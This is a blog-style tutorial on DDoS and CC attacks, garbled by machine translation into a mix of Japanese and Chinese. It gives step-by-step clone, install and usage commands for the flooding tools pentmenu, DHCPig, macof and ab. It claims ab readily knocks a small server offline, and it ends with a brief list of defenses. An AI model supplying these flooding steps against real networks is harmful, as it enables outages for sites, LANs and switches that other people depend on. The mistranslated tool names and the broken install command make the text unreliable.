DDoS および CC 攻撃
記事ディレクトリ
序章
Denial Of Service 拒绝服务攻击
DOS攻击 == 耗尽资源攻击
DDOS == 分布式攻击
DDoS 攻撃の目的
1.商业恶性竞争
2.勒索敲诈
3.实施报复
攻撃タイプ紹介
| 攻撃名 | 目標 |
|---|---|
| TCP SYN フラッド攻撃 | ウェブサーバー |
| CCアタック | ウェブサーバー |
| ウド洪水 | 各種サーバー |
| ICMP フラッド | 各種サーバー |
| DHCP フラッディング | DHCP サーバー |
| マックフラッディング | スイッチ |
DDoS および CC 攻撃の例
1.ペントメニュー
流量泛洪攻击
原則: ソフトウェアは常にトラフィック パケットをターゲット アドレスに送信するため、ネットワークが混雑し、リソースが枯渇します。
#软件
pentmenu
#功能
包含大部分 Flooding攻击模块
#使用kali
#从github上克隆需要的工具
git clone https://github.com/GinjaChris/pentmenu
#进入并且启动工具
cd pentmenu && ./pentmenu
#进入后选择第二个选项DOS
`可以选择相应的服务进行攻击`
2.DHCPig
局域网&内网攻击工具
原則:LAN & イントラネットのアドレスを使い果たし、1 時間以内にインターネットにアクセスできなくなります。
#软件
dhcpig
#功能
DHCP flood攻击
#下载并且安装插件
git clone https://github.com/secdev/scapy
解压scapy-master.zip并进入
python setup.py install 安装
##下载并且安装工具
git clone https://github.com/kamorin/DHCPig
解压:dhcpig-master.zip并进入解压目录
python setup.install 安装
#使用方法
pig.py eth0
3.MacOf
交换机MAC地址泛洪
原則:攻撃対象スイッチのMACアドレスを1秒間に20,000個占有
#软件
macof
#功能
MAC flood(攻击)
#插件
scapy
#下载并且安装插件
git clone https://github.com/secdev/scapy
解压scapy-master.zip并进入
python setup.py install 安装
#下载工具
git clone https://github.com/whitewinterwolf/macof.py
#使用方法
python macof.py -i eth0
4.アブ
网站压力测试工具
原則: ab コマンドは複数の同時アクセス スレッドを作成し、複数の訪問者が特定の URL アドレスに同時にアクセスするようにシミュレートします。
#软件
ab
#功能
CC攻击与网页压力测试,kali基本自带
#使用方法
ab -c 10 -n 100 https://x.x.x.x
#参数
-n:在测试会话中所有执行的请求个数,默认时,仅执行一个请求.
-c:一次产生的请求个数,默认是一次一个.
-t:测试锁进行的最大秒数.
#测试
ab -c 1000 -n 1000 -t 100 https://www.xxxx.com/
实测,1核2G服务器,直接可以打死,CPU直线飙升至百分之百
防御 DDoS メソッド
DDoS是目前最凶猛,最难防御的网络攻击之一.
现实情况是,这个世界级难题还没有完美的,彻底的解决办法.
1. ネットワーク機器・設備
1.扩充带宽硬抗.
2.使用硬件防火墙.
3.选择高性能设备.
2. 効果的な DDoS 対策のアイデアとソリューション
1.服务器负载均衡
2.CDN流量清洗
3. 予防第一
1.筛查系统漏洞
2.过滤不必要的服务和端口
3.系统资源优化
要約する
更多技术文章,请访问 www.linuxhy.top 技术分享吧,详细学习!!!